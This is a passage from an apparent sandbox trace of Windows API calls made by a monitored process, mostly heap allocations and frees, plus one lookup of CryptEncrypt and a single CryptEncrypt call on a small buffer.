hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0248.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0248.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0248.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0248.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0248.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0248.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0248.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0248.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0248.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0248.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0248.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0248.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0248.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0248.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0248.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0248.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0248.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0248.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0248.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0248.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0248.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0248.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0248.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.125] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.125] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0248.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0248.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0248.125] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.126] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0248.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0248.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0248.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0248.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0248.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0248.126] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0248.126] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0248.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0248.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0248.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0248.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0248.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0248.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0248.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0248.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0248.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0248.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0248.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0248.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0248.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0248.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0248.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0248.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0248.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0248.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0248.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0248.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0248.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0248.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0248.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.129] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0248.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0248.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0248.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0248.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0248.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0248.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0248.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0248.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0248.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0248.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0248.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0248.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0248.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0248.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0248.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0248.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0248.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0248.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0248.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0248.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0248.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0248.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0248.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0248.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa9b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0248.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0248.132] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0248.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0248.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0248.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6440 [0248.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0248.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0248.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0248.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0248.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0248.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0248.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0248.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0248.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0248.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0248.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0248.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0248.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0248.133] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b1828*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b1828*, pdwDataLen=0x8bef68*=0x8) returned 1 [0248.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0248.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0248.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0248.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0248.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0248.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0248.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0248.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0248.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0248.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0248.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0248.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0248.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0248.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0248.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0248.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0248.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0248.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0248.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0248.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0248.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0248.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0248.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0248.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0248.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0248.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0248.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0248.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0248.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0248.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0248.135] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0248.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0248.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0248.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0248.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0248.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0248.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0248.135] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.135] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0248.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0248.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0248.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0248.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0248.136] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0248.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0248.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0248.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0248.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0248.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0248.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0248.136] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.136] PeekMessageW (in: 